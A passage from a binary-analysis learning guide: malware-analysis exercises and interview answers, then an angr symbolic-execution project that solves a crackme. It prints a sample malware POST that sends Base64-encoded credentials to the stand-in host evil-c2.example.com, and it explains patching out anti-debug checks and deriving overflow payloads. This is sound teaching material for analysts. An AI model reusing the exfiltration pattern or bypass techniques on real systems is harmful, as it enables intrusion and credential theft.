  2. What tool would you use to unpack it?
  3. If unpacking fails, how would you manually unpack it dynamically?
  4. What would you look for after unpacking to start your analysis?
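
The section table in this exercise can also be checked mechanically. The following sketch encodes a few common packing heuristics; the `Section` type and `packing_hints` function are hypothetical helpers for this example, and the rules are hints that a legitimate binary can also trigger, not proof of packing.

```python
from typing import List, NamedTuple


class Section(NamedTuple):
    name: str
    virtual_size: int
    raw_size: int


def packing_hints(sections: List[Section]) -> List[str]:
    """Return human-readable reasons a section table looks packed (heuristics only)."""
    hints = []
    names = [s.name for s in sections]
    if any(n.startswith("UPX") for n in names):
        hints.append("UPX-style section names")
    if ".text" not in names:
        hints.append("no .text section")
    for s in sections:
        # Space reserved in memory but absent on disk is filled at run time by the stub.
        if s.raw_size == 0 and s.virtual_size > 0:
            hints.append(f"{s.name}: raw size 0 but virtual size {s.virtual_size:#x}")
    return hints


# Values copied from the exercise above.
sections = [
    Section("UPX0", 0x5000, 0x0),
    Section("UPX1", 0x8000, 0x7800),
    Section(".rsrc", 0x1000, 0x1000),
]
for hint in packing_hints(sections):
    print(hint)
```

In practice you would feed this from a PE parser rather than typing the values in, and combine it with per-section entropy.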

Exercise 3: Network Traffic Analysis

You capture this HTTP POST from malware:

POST /gate.php HTTP/1.1
Host: evil-c2.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded

id=PC-12345&os=Win10&data=dXNlcjpwYXNzd29yZDpjcmVkZW50aWFscw==

Questions:

  1. Decode the base64 data parameter. What is being exfiltrated?
  2. What are the network IOCs you can extract?
  3. How would you write a Snort/Suricata rule to detect this?
  4. How could the malware author make this harder to detect?
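
Decoding the captured body takes only the standard library. This is a small sketch for checking your answer to question 1; `decode_field` is a helper name made up here.

```python
import base64
from urllib.parse import parse_qs

# Body copied from the captured POST above.
body = "id=PC-12345&os=Win10&data=dXNlcjpwYXNzd29yZDpjcmVkZW50aWFscw=="


def decode_field(form_body: str, name: str) -> bytes:
    """Pull one form field out of a urlencoded body and Base64-decode it."""
    # Caveat: parse_qs turns a literal '+' into a space, so Base64 values that
    # contain '+' must have been percent-encoded by the sender to survive.
    value = parse_qs(form_body)[name][0]
    return base64.b64decode(value)


print(parse_qs(body)["id"][0])      # host identifier sent by the sample
print(decode_field(body, "data"))   # b'user:password:credentials'
```

The same two steps (split the form fields, then peel off each encoding layer) apply when the payload is XOR-ed or compressed underneath the Base64.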

Exercise 4: Anti-Analysis Technique Identification

You’re debugging malware in x64dbg and it keeps crashing. You notice this assembly:

call GetTickCount
mov ebx, eax
; ... some code ...
call GetTickCount
sub eax, ebx
cmp eax, 0x3E8      ; 1000ms
jg  exit_immediately

Questions:

  1. What anti-analysis technique is this?
  2. How would you bypass it in a debugger?
  3. How would you patch the binary to remove this check?
  4. What other timing-based checks might malware use?
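
One way to approach question 3 is to overwrite the conditional jump with NOPs. The sketch below works on a byte string and assumes the compiler emitted the short form of the jump (`jg rel8`, opcode 0x7F) directly after `cmp eax, 0x3E8` (bytes 3D E8 03 00 00); the sample bytes and the function name are hypothetical. A real binary may use the near form (0F 8F rel32) or different registers, so confirm the encoding in a disassembler first.

```python
CMP_EAX_1000 = bytes.fromhex("3de8030000")   # cmp eax, 0x3E8
JG_SHORT = 0x7F                               # opcode of jg rel8
NOP = 0x90


def nop_timing_jump(code: bytes) -> bytes:
    """Replace each 2-byte `jg rel8` that directly follows `cmp eax, 0x3E8` with NOPs."""
    patched = bytearray(code)
    start = 0
    while (idx := code.find(CMP_EAX_1000, start)) != -1:
        jmp = idx + len(CMP_EAX_1000)
        if jmp + 1 < len(code) and code[jmp] == JG_SHORT:
            patched[jmp] = NOP
            patched[jmp + 1] = NOP
        start = idx + 1
    return bytes(patched)


# Hypothetical bytes: sub eax, ebx ; cmp eax, 0x3E8 ; jg +0x10 ; ret
sample = bytes.fromhex("29d8" "3de8030000" "7f10" "c3")
print(nop_timing_jump(sample).hex())   # 29d83de80300009090c3
```

Patching changes the file hash and can trip integrity checks, which is the trade-off against simply editing EAX or the flags in the debugger at run time.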

The Interview Questions They’ll Ask

  1. “Walk me through your complete malware analysis workflow, from receiving a sample to writing a report.”
    • Expected Answer: (1) Triage: hash check, VirusTotal, file type. (2) Safe Lab: isolated VM, snapshot. (3) Behavioral: run with procmon/tcpdump, observe actions. (4) Static: strings, imports, unpack if needed. (5) Deep dive: disassemble key functions, understand crypto/obfuscation. (6) Report: IOCs, YARA rule, detection strategies, mitigation advice.
  2. “You receive a packed malware sample. How do you unpack it?”
    • Expected Answer: (1) Identify packer (strings, entropy, UPX signature). (2) Try automated tools (upx -d, online unpacking services such as UnpacMe). (3) If that fails, unpack dynamically: run in a debugger, find the OEP (Original Entry Point) after the unpacking stub, dump memory. (4) Fix the import table if needed. (5) Validate that the unpacked binary runs correctly.
  3. “How would you identify the C2 server in a malware sample using only static analysis?”
    • Expected Answer: (1) Strings search for IPs, domains, URLs. (2) Check data sections for encoded/encrypted configs. (3) Analyze code for decryption routines. (4) Look for DGA (Domain Generation Algorithm) if no hardcoded domains. (5) Check resources for embedded configs. Sometimes this requires a hybrid approach: breakpoint on network functions, dump arguments.
  4. “Explain the difference between signature-based, heuristic, and behavioral malware detection.”
    • Expected Answer: Signature: exact pattern matching (hash, byte sequences); fast, very few false positives, but easily evaded. Heuristic: fuzzy matching, YARA rules, structural patterns; catches variants, some false positives. Behavioral: monitors actions (file writes, registry changes); catches zero-days, but adds runtime overhead and requires sophisticated analysis.
  5. “A malware sample won’t run in your VM. It just exits immediately. What do you do?”
    • Expected Answer: Likely anti-VM checks. (1) Static analysis: look for VM detection (CPUID, registry checks, process names). (2) Patch checks: NOP out conditional jumps. (3) Modify environment: change VM artifacts, rename VBoxService.exe. (4) Use bare metal if possible. (5) Hybrid: use IDA + debugger to trace execution path, find exit condition.
  6. “What’s process hollowing and how would you detect it?”
    • Expected Answer: What: Malware creates a legitimate process in a suspended state, unmaps its memory, writes malicious code, and resumes it. It looks legitimate in the process list. Detection: (1) Memory forensics: compare the on-disk image to the in-memory image; a mismatch indicates hollowing. (2) Monitor API sequence: CreateProcess (suspended), ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread. (3) Tools: Volatility’s hollowfind plugin.
  7. “How do you determine if malware uses encryption, and how do you extract the key?”
    • Expected Answer: (1) Detection: high entropy sections, crypto constants (AES S-boxes, RC4 KSA), imports from crypto libraries. (2) Key extraction: If runtime encryption, breakpoint on encrypt/decrypt function, inspect arguments. If config encryption, find decryption routine, trace back to key (often XOR or AES with hardcoded key). (3) For XOR, frequency analysis or known-plaintext attacks.
  8. “What’s the difference between static and dynamic malware analysis, and when would you use each?”
    • Expected Answer: Static: analyze without executing; safe, fast, works on any platform, but defeated by obfuscation/packing. Good for: IOC extraction, packer identification, quick triage. Dynamic: execute in a sandbox; sees runtime behavior and defeats packing, but requires a safe environment, malware might detect the VM, and time-delayed payloads might not trigger. Use both: static for triage, dynamic for behavior, back to static for deep understanding.
  9. “How would you analyze ransomware safely without infecting your entire network?”
    • Expected Answer: (1) Isolation: VM with NO network access, or completely isolated VLAN. (2) Snapshots: before running, snapshot everything. (3) Shares: DO NOT mount network shares or shared folders. (4) Monitoring: procmon, regshot, file monitoring to see encryption activity. (5) Static first: don’t run if you can extract encryption scheme statically. (6) Sacrifice VM: expect it to be destroyed, revert to snapshot after. (7) Memory forensics: dump memory to get keys if possible.
  10. “You find a suspicious PowerShell script. How do you analyze it?”
    • Expected Answer: (1) Deobfuscate: remove backticks, undo character substitution, base64 decode. (2) Beautify: format for readability. (3) Static analysis: what commands does it run? Download from URL? Execute shellcode? (4) Sandbox: run it in PowerShell ISE inside the lab VM with an execution-policy bypass and trace execution. (5) Script logging: enable PowerShell logging in Windows. (6) IOCs: extract URLs, IPs, file paths. (7) Tools: PowerShell_decoder, CyberChef, REMnux.
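
The "base64 decode" step in question 10 has one detail that trips people up: the argument to `powershell -EncodedCommand` is Base64 over UTF-16LE text, not UTF-8. A minimal sketch, using a harmless command built inside the example rather than a real sample:

```python
import base64


def decode_encoded_command(b64: str) -> str:
    """Decode the argument of `powershell -EncodedCommand` (Base64 of UTF-16LE text)."""
    return base64.b64decode(b64).decode("utf-16-le")


# Round-trip with a harmless command so the example is self-checking.
sample = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode("ascii")
print(sample)
print(decode_encoded_command(sample))
```

Decoding as UTF-8 instead yields text with a NUL byte after every ASCII character, which is a quick way to recognize that you picked the wrong encoding.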

Books That Will Help

| Topic | Book | Chapter/Section | Why It Matters |
|---|---|---|---|
| Complete Malware Analysis Workflow | “Practical Malware Analysis” by Sikorski & Honig | Ch. 1-3: Basic Static and Dynamic Analysis | The canonical reference for malware analysis methodology |
| Lab Setup & Safe Environments | “Practical Malware Analysis” | Ch. 2: Malware Analysis in Virtual Machines | How to build an analysis lab that won’t infect you |
| PE File Format | “Practical Malware Analysis” | Ch. 1: Basic Static Techniques | Understanding Windows executables |
| x86/x64 Assembly for Malware | “Practical Malware Analysis” | Ch. 4: A Crash Course in x86 Disassembly | Reading the assembly that malware generates |
| Windows API & Malware Techniques | “Practical Malware Analysis” | Ch. 7-12: Advanced Dynamic/Static Analysis | How malware uses Windows internals |
| Anti-Analysis Techniques | “Practical Malware Analysis” | Ch. 15-18: Anti-Disassembly, Anti-Debugging, Anti-Virtual Machine Techniques, Packers and Unpacking | Defeating malware countermeasures |
| Binary File Formats (PE & ELF) | “Practical Binary Analysis” by Dennis Andriesse | Ch. 2-3: The ELF Format; The PE Format | Understanding executable structure |
| Advanced Disassembly | “Practical Binary Analysis” | Ch. 6: Disassembly and Binary Analysis Fundamentals | Techniques for analyzing obfuscated code |
| Dynamic Binary Instrumentation | “Practical Binary Analysis” | Ch. 9: Binary Instrumentation | Using tools like Pin, DynamoRIO for analysis |
| Windows Internals for Malware | “Windows Internals” by Russinovich & Solomon | Part 1, Ch. 3: System Mechanisms | Understanding Windows under the hood |
| Process Injection Techniques | “The Art of Memory Forensics” by Ligh et al. | Ch. 11: Malware Detection | How malware hides in memory |
| Memory Forensics for Malware | “The Art of Memory Forensics” | Ch. 11: Malware Detection | Extracting malware from memory dumps |
| Network-Based Malware Analysis | “Practical Malware Analysis” | Ch. 14: Malware-Focused Network Signatures | Analyzing C2 communication |
| Cryptography in Malware | “Practical Malware Analysis” | Ch. 13: Data Encoding | Understanding how malware uses crypto |
| Low-Level Programming & Assembly | “Low-Level Programming” by Igor Zhirkov | Ch. 3-5: Assembly Programming | Deep understanding of assembly for analysis |
| Exploit Development Context | “Hacking: The Art of Exploitation” by Jon Erickson | Ch. 0x500: Shellcode | Understanding shellcode that malware might use |
| Reverse Engineering Fundamentals | “Practical Binary Analysis” | Ch. 7: Simple Code Injection Techniques for ELF | Techniques malware uses for code injection |

Project 11: Symbolic Execution with angr

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: None (angr is Python-only)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 4: Expert
  • Knowledge Area: Program Analysis / Constraint Solving
  • Software or Tool: angr framework, Python 3
  • Main Book: angr documentation

What you’ll build: Use symbolic execution to automatically find inputs that reach specific program states, solving CTF challenges and finding bugs.

Why it teaches binary analysis: Symbolic execution represents the frontier of automated program analysis. It finds paths humans might miss.

Core challenges you’ll face:

  • Setting up states → maps to defining where to start
  • Avoiding path explosion → maps to constraining exploration
  • Finding target addresses → maps to what state do you want?
  • Extracting solutions → maps to getting concrete inputs

Resources for key challenges:

Key Concepts:

  • Symbolic State: angr docs - Core Concepts
  • Exploration Techniques: angr docs - Simulation
  • Constraint Solving: Z3 solver basics

Difficulty: Expert
Time estimate: 2-3 weeks
Prerequisites: Projects 1-8, Python proficiency

Real world outcome:

import angr
import claripy

# Load binary
proj = angr.Project('./crackme', auto_load_libs=False)

# Create symbolic input (32 bytes)
password = claripy.BVS('password', 32 * 8)

# Create initial state at entry point
state = proj.factory.entry_state(
    args=['./crackme'],
    stdin=angr.SimFile('/dev/stdin', content=password)
)

# Create simulation manager
simgr = proj.factory.simulation_manager(state)

# Explore: find 'success', avoid 'failure'
simgr.explore(
    find=lambda s: b"Correct" in s.posix.dumps(1),
    avoid=lambda s: b"Wrong" in s.posix.dumps(1)
)

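# Extract solution
if simgr.found:
    solution = simgr.found[0].solver.eval(password, cast_to=bytes)
    # Bytes the program never constrains can take any value, so decode defensively
    text = solution.rstrip(b"\x00").decode(errors="replace")
    print(f"Password: {text}")
else:
    print("No solution found")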

# Output:
# Password: sup3r_s3cr3t_k3y

Implementation Hints:

angr workflow:

  1. Load binary with angr.Project()
  2. Create symbolic variables with claripy.BVS()
  3. Create initial state with factory.entry_state()
  4. Create simulation manager with factory.simulation_manager()
  5. Explore with simgr.explore(find=..., avoid=...)
  6. Extract solution with solver.eval()

Tips for avoiding path explosion:

  • Use avoid to skip irrelevant paths
  • Set memory limits on states
  • Use hooks to skip complex functions
  • Start exploration from specific addresses
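
To get a feel for why `avoid` matters, here is a toy model in plain Python (no angr involved). It assumes a byte-by-byte check where every comparison forks the state into a "matched" and a "mismatched" successor, and counts how many states the explorer has to step with and without pruning. The `explore` function and its state representation are invented for this illustration.

```python
from collections import deque


def explore(depth, avoid=None):
    """Breadth-first walk over a binary decision tree; returns how many states were stepped."""
    stepped = 0
    queue = deque([()])              # a state is the tuple of branch outcomes so far
    while queue:
        state = queue.popleft()
        stepped += 1
        if len(state) == depth:      # reached the end of the check
            continue
        for taken in (True, False):
            successor = state + (taken,)
            if avoid and avoid(successor):
                continue             # pruned: never stepped, never forks again
            queue.append(successor)
    return stepped


print(explore(10))                                    # 2047 states without pruning
print(explore(10, avoid=lambda s: s[-1] is False))    # 11 states when mismatches are avoided
```

Ten branches already separate 2047 states from 11. Real binaries fork far more often, which is why a well-chosen `avoid` address is usually the first tuning step.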

Common patterns:

# Find by address
simgr.explore(find=0x401234, avoid=0x401111)

# Find by output string
simgr.explore(
    find=lambda s: b"WIN" in s.posix.dumps(1),
    avoid=lambda s: b"LOSE" in s.posix.dumps(1)
)

# Hook a function
@proj.hook(0x401000, length=5)
def skip_check(state):
    state.regs.eax = 1  # Always succeed

Learning milestones:

  1. Solve simple crackme → Basic symbolic execution
  2. Handle complex inputs → Symbolic arrays
  3. Use hooks → Skip annoying functions
  4. Solve CTF challenges → Real-world application

The Core Question You’re Answering

“Can we automatically explore all possible execution paths in a program and mathematically prove which inputs reach specific program states, without manually testing every input?”

This project introduces symbolic execution, a technique that treats program inputs as mathematical symbols rather than concrete values. Instead of testing one input at a time, you’ll explore entire classes of inputs simultaneously, using constraint solvers to find the exact input that triggers a bug or reaches a target state.
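
The idea can be shown without angr or Z3. In the toy below, the constraints collected along one path are written as (byte index, operator, value) triples, and a brute-force loop stands in for the SMT solver. Everything here is a deliberately simplified assumption: the `Constraint` format, the `solve` function, and the checked program are hypothetical, and real path constraints relate many bytes through arithmetic rather than pinning them one at a time.

```python
from typing import List, Optional, Tuple

Constraint = Tuple[int, str, int]   # (byte index, "==" or "!=", value)


def solve(constraints: List[Constraint], length: int) -> Optional[bytes]:
    """Brute-force stand-in for an SMT solver: choose each byte independently."""
    out = bytearray(length)
    for i in range(length):
        mine = [(op, v) for idx, op, v in constraints if idx == i]
        for candidate in range(0x20, 0x7F):           # printable ASCII only
            if all((candidate == v) if op == "==" else (candidate != v)
                   for op, v in mine):
                out[i] = candidate
                break
        else:
            return None                                # no value fits: unsatisfiable
    return bytes(out)


# Path constraints along the "success" path of a hypothetical check:
#   if (in[0] == 'O' && in[1] == 'K' && in[2] != '?') success();
path = [(0, "==", ord("O")), (1, "==", ord("K")), (2, "!=", ord("?"))]
print(solve(path, 3))                                  # b'OK '
print(solve([(0, "==", 65), (0, "==", 66)], 1))        # None (contradictory path)
```

The second call shows what an infeasible path looks like: no input satisfies both constraints, so a symbolic executor would discard that state instead of exploring further.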

Concepts You Must Understand First

  1. Concrete vs. Symbolic Execution
    • Concrete execution: run program with specific input (“test123”), get specific output
    • Symbolic execution: run program with symbolic input (x₀, x₁, x₂, …), track constraints
    • How symbolic execution explores multiple paths simultaneously

    Guiding Questions:

    • What happens when a program branches on symbolic input (if (input[0] == 'A'))?
    • How does symbolic execution differ from fuzzing (which uses random concrete inputs)?
    • Why is symbolic execution deterministic while fuzzing is probabilistic?

    Book References:

    • "Practical Binary Analysis" by Dennis Andriesse - Chapter 11.4: Symbolic Execution
    • angr documentation - Core Concepts: Symbolic Variables
    • Academic paper: "A Survey of Symbolic Execution Techniques" (Baldoni et al., 2018)
  2. SMT Solvers and Constraint Solving
    • Satisfiability Modulo Theories (SMT): solving logical formulas over different domains
    • Z3 solver (used by angr): determines if constraints are satisfiable
    • Constraints accumulate as execution proceeds: x[0] == 'A' AND x[1] != 'B' AND ...

    Guiding Questions:

    • What does it mean for a set of constraints to be "unsatisfiable"?
    • How does angr use Z3 to generate concrete inputs from symbolic constraints?
    • Why is SMT solving computationally expensive (NP-hard in general)?

    Book References:

    • Z3 Tutorial: "Programming Z3" (De Moura & Bjørner)
    • "Computer Systems: A Programmer's Perspective" - Chapter 2.2: Integer Representations (foundation for bitvector logic)
  3. Path Explosion Problem
    • Exponential growth of paths: n branches on symbolic data → up to 2^n possible paths
    • Loops amplify explosion: a 100-iteration loop that branches on symbolic data each iteration can yield up to 2^100 paths
    • Mitigations: path merging, state pruning, selective exploration

    Guiding Questions:

    • Why can a simple loop for(i=0; i<100; i++) create path explosion when its body branches on symbolic input?
    • How do you prioritize which paths to explore first?
    • What's the trade-off between path coverage and analysis time?

    Book References:

    • "Practical Binary Analysis" - Chapter 11.4: Symbolic Execution (discusses path explosion)
    • angr documentation - Exploration Techniques
  4. Intermediate Representation (IR)
    • angr uses VEX IR (from Valgrind) to represent machine code abstractly
    • Why IR: easier to analyze than raw assembly, architecture-independent
    • Statements, expressions, and temporary variables in VEX

    Guiding Questions:

    • Why doesn't angr operate directly on x86/ARM assembly?
    • What information is lost when translating assembly → IR?
    • How do you map a VEX IR address back to assembly for debugging?

    Book References:

    • angr documentation - Core Concepts: Intermediate Representation
    • "Practical Binary Analysis" - Chapter 11.3: Dynamic Binary Instrumentation (similar IR concepts)
  5. Simulation State and Memory Models
    • angr's SimState: CPU registers, memory, file system, all symbolic or concrete
    • Symbolic memory: can read/write symbolic values
    • Lazy memory model: only allocates pages when accessed

    Guiding Questions:

    • What happens when you read from a symbolic memory address?
    • How does angr decide whether a memory value is symbolic or concrete?
    • Why is lazy memory initialization important for performance?

    Book References:

    • angr documentation - Core Concepts: States
    • angr documentation - Top-Level Interfaces: Simulation Managers
  6. Control Flow Graph (CFG) Recovery
    • angr builds CFG by discovering basic blocks and edges
    • Static CFG (fast, incomplete) vs. Dynamic CFG (slower, more accurate)
    • Function boundaries, indirect jumps, and obfuscation challenges

    Guiding Questions:

    • How does angr discover code in a stripped binary without symbols?
    • What makes indirect jumps (jmp rax) hard for CFG recovery?
    • Why might a packed binary confuse CFG analysis?

    Book References:

    • "Practical Binary Analysis" - Chapter 6.3: Control Flow Graph Recovery
    • angr documentation - Advanced Topics: CFG
  7. Symbolic Execution Strategies
    • DFS (Depth-First Search): go deep, might miss states
    • BFS (Breadth-First Search): explore level-by-level, memory intensive
    • Veritesting: smart path merging to reduce state explosion
    • Custom exploration: prioritize based on distance to target

    Guiding Questions:

    • When would DFS find a solution faster than BFS?
    • What's path merging and why does it help with loops?
    • How do you write a custom exploration technique?

    Book References:

    • angr documentation - Simulation Managers: Exploration Techniques
    • Paper: "Enhancing Symbolic Execution with Veritesting" (Avgerinos et al., 2014)
  8. Hooking and Environment Interaction
    • Replacing library functions with Python summaries (SimProcedures)
    • Modeling system calls without actually executing them
    • Creating simplified environments for complex functions

    Guiding Questions:

    • Why hook strlen() instead of symbolically executing it?
    • How do you model a network socket in symbolic execution?
    • What happens if you don't hook malloc() and the program allocates GB of memory?

    Book References:

    • angr documentation - Advanced Topics: SimProcedures
    • angr documentation - Examples: Hooking
  9. Constraint Optimization and Caching
    • Incremental solving: reuse previous solutions
    • Constraint simplification before sending to Z3
    • State cloning and copy-on-write optimizations

    Guiding Questions:

    • Why is solving x == 5 much faster than x * y + z == 1000?
    • How does angr cache solver results to speed up analysis?
    • Whatโ€™s the cost of cloning a state with gigabytes of symbolic memory?

    Book References:

    • angr documentation - Solver Engine
    • Academic paper on symbolic execution optimization techniques
  10. Concretization Strategies
    • When symbolic execution can't continue symbolically (e.g., symbolic jump target)
    • Concretization: picking a concrete value for a symbolic variable
    • Strategies: max/min value, single solution, all solutions (fork)

    Guiding Questions:

    • What happens when a program does jmp [symbolic_address]?
    • Why might concretization cause you to miss valid paths?
    • How do you decide which value to concretize to?

    Book References:

    • angr documentation - Solver: Concretization Strategies

Questions to Guide Your Design

  1. How do you choose the right starting point for symbolic execution?
    • Start at entry point (complete but slow) vs. start at function of interest (fast but requires setup)
    • How do you set up registers/memory when starting mid-program?
  2. How do you write a find condition that's neither too broad nor too narrow?
    • Too broad: "any state that prints output" (finds wrong solution)
    • Too narrow: "state at address 0x401234" (misses alternate paths)
    • Consider: output strings, register values, success indicators
  3. What's your strategy for dealing with loops in symbolic execution?
    • Hook and skip them? Bound the iteration count? Use loop summarization?
    • When is it safe to unroll a loop symbolically?
  4. How do you handle programs that read from files or network?
    • Model file contents as symbolic variables
    • Create SimFiles with symbolic or concrete content
    • What if the file size itself affects control flow?
  5. When should you use hooks vs. letting angr execute the real code?
    • Hook when: function is complex (encryption), irrelevant (logging), or environment-dependent (network)
    • Don't hook when: function contains target logic, or you need exact behavior
  6. How do you extract useful information from an "avoided" state?
    • Sometimes you want to know why a path was avoided (e.g., failed authentication)
    • Can you extract constraints from avoided states to understand preconditions?
  7. How would you use angr to find buffer overflow vulnerabilities?
    • Create symbolic buffer, look for states where return address is symbolic
    • Check if constraints allow attacker-controlled values in RIP/EIP
  8. What's the difference between angr and a fuzzer like AFL++?
    • angr: deterministic, finds exact inputs, but slow and suffers path explosion
    • AFL++: probabilistic, fast, but might miss rare conditions
    • When would you use one over the other?

Thinking Exercise

Exercise 1: Understanding Symbolic Constraints

Consider this simple program:

int check_password(char *input) {
    if (input[0] == 'P' && input[1] == 'W' && input[2] - input[3] == 5) {
        return 1;  // Success
    }
    return 0;  // Fail
}

If input is symbolic, answer:

  1. What constraint is added after the first comparison (input[0] == 'P')?
  2. What are ALL the constraints accumulated by the time we reach return 1?
  3. Give one concrete input that satisfies these constraints (besides "PW...").
  4. How many possible concrete inputs exist? (Hint: think about input[2] and input[3])
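Once you have reasoned about question 4 by hand, one way to check your count is brute force. The sketch below assumes each `input[i]` is an unsigned byte (0-255), that only bytes 0-3 are constrained, and that C's integer promotion means the subtraction does not wrap. It ignores whether a NUL byte would be acceptable in a real string.

```python
# Count byte pairs (input[2], input[3]) satisfying input[2] - input[3] == 5.
# Assumption: unsigned bytes, no wraparound (operands are promoted to int in C).
pairs = [(a, b) for a in range(256) for b in range(256) if a - b == 5]

# input[0] and input[1] are pinned to 'P' and 'W': one choice each.
total = 1 * 1 * len(pairs)
print("satisfying 4-byte prefixes:", total)

# One concrete witness, built from the first pair found.
witness = bytes([ord("P"), ord("W"), *pairs[0]])
print("example:", witness)
```

A solver answers the same question without enumerating: it returns one satisfying assignment, and you can ask for more by excluding the ones already seen.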

Exercise 2: Path Explosion Calculation

Consider this code:

for (int i = 0; i < N; i++) {
    if (input[i] == 'A') {
        process_A();
    } else {
        process_B();
    }
}

Questions:

  1. How many paths exist for N=5?
  2. How many paths for N=20?
  3. If each state takes 1 second to solve, how long for N=30?
  4. What techniques could angr use to reduce this explosion?
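The arithmetic behind questions 1-3 can be sketched in a few lines. The only assumption is the one stated in the exercise: every iteration forks on `input[i]`, so each one doubles the path count, and each path costs one second.

```python
SECONDS_PER_YEAR = 365.25 * 24 * 3600

def path_count(n_iterations: int) -> int:
    """Each iteration forks once on symbolic input, giving 2**N paths."""
    return 2 ** n_iterations

for n in (5, 20, 30):
    paths = path_count(n)
    years = paths / SECONDS_PER_YEAR  # at one second per path
    print(f"N={n:2d}: {paths:>13,} paths, about {years:.2g} years at 1 s each")
```

The jump from N=20 to N=30 is the practical lesson: ten more iterations multiply the work by 1,024.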

Exercise 3: Writing a Find Condition

You're analyzing a crackme that prints either "Correct password!" or "Try again." to stdout. Write the angr find and avoid conditions:

simgr.explore(
    find=???,
    avoid=???
)

Consider:

  • Should you search for output strings? Address? Register values?
  • What if the program prints both messages under different conditions?
  • How do you avoid false positives?
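One possible answer, sketched as two standalone predicates. `state.posix.dumps(1)` is the same angr call used in the "Common patterns" snippet earlier to read stdout. The `fake_state` helper is hypothetical and exists only so the predicates can be exercised without angr installed.

```python
from types import SimpleNamespace

def found(state) -> bool:
    """find= predicate: the success banner has been written to stdout (fd 1)."""
    return b"Correct password!" in state.posix.dumps(1)

def rejected(state) -> bool:
    """avoid= predicate: the failure banner has been written to stdout."""
    return b"Try again." in state.posix.dumps(1)

def fake_state(stdout: bytes):
    """Hypothetical stand-in for an angr state, used only for this demo."""
    posix = SimpleNamespace(dumps=lambda fd: stdout if fd == 1 else b"")
    return SimpleNamespace(posix=posix)

# With a real project these would be passed as:
#   simgr.explore(find=found, avoid=rejected)
print(found(fake_state(b"Correct password!\n")))
print(rejected(fake_state(b"Try again.\n")))
print(found(fake_state(b"Try again.\n")))
```

Matching the full banner rather than a short substring such as "Correct" is one way to reduce false positives when the binary prints other text.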

Exercise 4: Designing a Hook

The target program calls strlen(user_input) and you want to hook it for performance:

@proj.hook(strlen_address)
def strlen_hook(state):
    # Your implementation here
    pass

Questions:

  1. How do you get the string pointer from the function argument?
  2. How do you calculate symbolic string length?
  3. What do you return and where do you put it?
  4. What edge cases might break your hook?

Exercise 5: Debugging Symbolic Execution

You run angr on a crackme and it explores 10,000 states in 5 minutes without finding a solution. What do you check?

  1. Is path explosion happening? (Check active/deadended states count)
  2. Is the find condition correct? (Print state info when states reach suspected area)
  3. Are you starting from the right place?
  4. Should you add hooks to skip expensive functions?
  5. Are there loops that need bounding?

Write a debugging checklist for troubleshooting angr scripts.

The Interview Questions They'll Ask

  1. "Explain symbolic execution to someone who only knows basic programming."
    • Expected Answer: "Instead of running a program with one specific input like 'hello', symbolic execution runs it with a placeholder 'X' that represents ANY possible input. As the program runs, it tracks rules like 'if X[0] == 'h' then take this branch, else take that branch'. At the end, it uses a math solver to find what X should be to reach a specific goal, like printing 'success'."
  2. "What's the path explosion problem and how do you mitigate it?"
    • Expected Answer: Each branch doubles possible paths (2^n growth). Loops amplify this massively. Mitigations: (1) Bound loop iterations. (2) Use avoid to prune uninteresting paths. (3) Path merging (veritesting). (4) Start execution closer to target. (5) Hook complex functions. (6) Use exploration strategies like DFS or prioritized search. (7) Set state limits and timeouts.
  3. "When would you use symbolic execution instead of fuzzing?"
    • Expected Answer: Use symbolic execution when: (1) You need to find exact input for rare condition (e.g., exact password, magic number). (2) Path requires multiple constraints (fuzzing unlikely to hit). (3) You need proof input exists vs. probabilistic search. Use fuzzing when: (1) Fast results needed. (2) Program is large (path explosion). (3) Target is common bugs (crashes) not specific paths.
  4. "How does angr use Z3 solver?"
    • Expected Answer: angr accumulates constraints as path conditions (e.g., x[0] == 'P' AND x[1] == 'W' AND x[2] > 100). When you ask for a solution, angr converts these to Z3's bitvector logic and asks "is this satisfiable?" Z3 uses SMT solving algorithms to either find values that satisfy all constraints, or prove none exist.
  5. "You're symbolically executing a program and angr hangs. What do you do?"
    • Expected Answer: (1) Check state counts - are active states growing without bound? (2) Look for unbounded loops in source/assembly. (3) Enable debug logging to see where it's stuck. (4) Try a different exploration strategy (DFS vs BFS). (5) Add hooks to skip expensive functions. (6) Bound the work per run: cap path length (for example with the LengthLimiter exploration technique) or prune the active stash yourself. (7) Check if the solver is the bottleneck (complex constraints). (8) Start execution closer to the target to reduce state space.
  6. "What's the difference between angr's static CFG and dynamic CFG?"
    • Expected Answer: Static CFG (CFGFast): analyzes binary without execution, fast, incomplete (misses computed jumps, self-modifying code). Uses pattern matching for function prologue/epilogue. Dynamic CFG (CFGEmulated): traces execution symbolically, slower, more accurate, finds code through actual control flow. Use static for quick overview, dynamic for precision.
  7. "How would you use angr to find a buffer overflow?"
    • Expected Answer: (1) Create symbolic buffer as input. (2) Track stack pointer and return address. (3) Look for states where return address contains symbolic bits (means we control it). (4) Check if constraints allow attacker values (not just symbolic). (5) Use solver to generate overflow payload. (6) Alternatively: look for states where rip/eip is symbolic, or where invalid memory access occurs.
  8. "Explain what happens when you hit a symbolic jump target (jmp [symbolic_address])."
    • Expected Answer: angr can't symbolically execute jump to unknown location. It must concretize: choose a concrete value for the address. Strategies: (1) Try all possible values (forks states - explosion!). (2) Use concretization strategy (max, min, or random value). (3) Constrain address to valid code region. (4) This can cause path loss if you concretize to wrong value. Ideally, constrain jump target based on prior analysis.
  9. "How do angr hooks (SimProcedures) work and when should you use them?"
    • Expected Answer: Hooks replace function execution with Python code. When PC reaches hooked address, angr calls Python instead of executing instructions. Use when: (1) Function is expensive (crypto). (2) Environment interaction (file I/O, network). (3) Known behavior (strlen, memcpy) - summarize rather than execute. How: Read arguments from state.regs/memory, compute result, write to return value, adjust stack/PC. Example: hook strcmp to just compare symbolic strings symbolically without executing assembly.
  10. "What's veritesting and why is it useful?"
    • Expected Answer: Veritesting merges multiple execution paths into a single state using conditional expressions. Instead of forking at each branch (exponential states), it creates merged state: result = if(cond) then A else B. Dramatically reduces path explosion for straight-line code with many branches. Most useful for code with many conditionals but few loops. Enabled with simgr.use_technique(angr.exploration_techniques.Veritesting()).

Books That Will Help

| Topic | Book | Chapter/Section | Why It Matters |
|---|---|---|---|
